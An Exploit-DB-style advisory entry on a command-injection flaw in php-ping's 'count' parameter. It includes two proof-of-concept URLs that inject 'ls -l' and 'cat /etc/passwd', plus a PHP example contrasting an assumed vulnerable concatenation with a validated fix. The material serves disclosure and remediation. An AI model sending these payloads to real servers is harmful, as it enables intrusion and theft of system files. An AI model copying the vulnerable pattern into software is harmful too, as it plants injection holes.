PHP-ping - 'Count' Command Execution

Author: ppp-design
type: webapps
platform: php
port: 
date_added: 2003-12-29  
date_updated: 2012-12-18  
verified: 1  
codes: OSVDB-3254  
tags:   
aliases:   
screenshot_url:   
application_url:   

raw file: 23487.txt  
source: https://www.securityfocus.com/bid/9309/info

It has been reported that php-ping may be prone to a remote command execution vulnerability. The problem exists because shell metacharacters supplied through the 'count' parameter of the php-ping.php script are not sufficiently sanitized before the value is used in a shell command.

Exploitation would permit a remote attacker to execute arbitrary commands with the privileges of the web server hosting the vulnerable software.

http://www.example.com/php-ping.php?count=1+%26+ls%20-l+%26&submit=Ping%21
http://www.example.com/php-ping.php?count=1+%26+cat%20/etc/passwd+%26&submit=Ping%21
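The advisory describes the flaw but does not show php-ping's source. The following is an added example, not code from php-ping or from the advisory: the "before" function is an assumed reconstruction of the pattern described (a request parameter concatenated into a shell command), and the "after" function shows the validation that would have rejected the decoded payload from the first URL above (`count=1 & ls -l &`). The `host` parameter and all function names are hypothetical; the original script's parameter set is only partly known from the page.

```php
<?php
// Added example, not php-ping's own code. The advisory does not show the
// vulnerable source; the "before" below is an assumed reconstruction of the
// pattern it describes (request parameter concatenated into a shell command).
// The 'host' parameter is hypothetical; the page only shows 'count' and 'submit'.

// BEFORE (assumed vulnerable pattern): 'count' reaches the shell unfiltered,
// so a value containing shell metacharacters runs additional commands with
// the web server's privileges.
function vulnerable_ping_command(array $params): string
{
    return 'ping -c ' . $params['count'] . ' ' . $params['host'];
}

// AFTER: request data must never reach the shell as syntax. 'count' has to be
// a small positive integer; 'host' has to parse as an IP address or hostname
// and is still quoted with escapeshellarg() as a second layer of defence.
function safe_ping_command(array $params): ?string
{
    $count = filter_var($params['count'] ?? '', FILTER_VALIDATE_INT, [
        'options' => ['min_range' => 1, 'max_range' => 10],
    ]);
    if ($count === false) {
        // Anything that is not a bare integer in range is rejected here,
        // including the advisory's "1 & ls -l &" payload.
        return null;
    }

    $host = $params['host'] ?? '';
    $isIp = filter_var($host, FILTER_VALIDATE_IP) !== false;
    $isHostname = filter_var($host, FILTER_VALIDATE_DOMAIN, FILTER_FLAG_HOSTNAME) !== false;
    if (!$isIp && !$isHostname) {
        // Spaces, metacharacters or an empty value never form a valid host.
        return null;
    }

    return 'ping -c ' . $count . ' ' . escapeshellarg($host);
}

// Request handler: the command is built only after validation succeeds, and a
// rejected request produces a 400 rather than a partially sanitized command.
function handle_ping_request(array $get): string
{
    $cmd = safe_ping_command($get);
    if ($cmd === null) {
        http_response_code(400);
        return 'Invalid count or host.';
    }
    return (string) shell_exec($cmd);
}

if (PHP_SAPI === 'cli') {
    // Constructed inputs: the URL-decoded payload from the advisory's first
    // request, and a benign request for comparison.
    $malicious = ['count' => '1 & ls -l &', 'host' => 'example.com'];
    $benign    = ['count' => '3',           'host' => 'example.com'];

    echo "assumed vulnerable command: ", vulnerable_ping_command($malicious), "\n";
    var_dump(safe_ping_command($malicious));
    var_dump(safe_ping_command($benign));
}
```

Run from the command line with `php example.php`: the first `var_dump` shows the malicious request rejected (`NULL`) while the benign one yields a `ping` command with the integer count and the single-quoted host. Validating `count` as an integer is the decisive fix; `escapeshellarg()` on the host is kept as defence in depth, and a stricter design would avoid `shell_exec()` entirely by invoking `ping` through `proc_open()` with an argument array (PHP 7.4 and later) so that no shell parses the input at all.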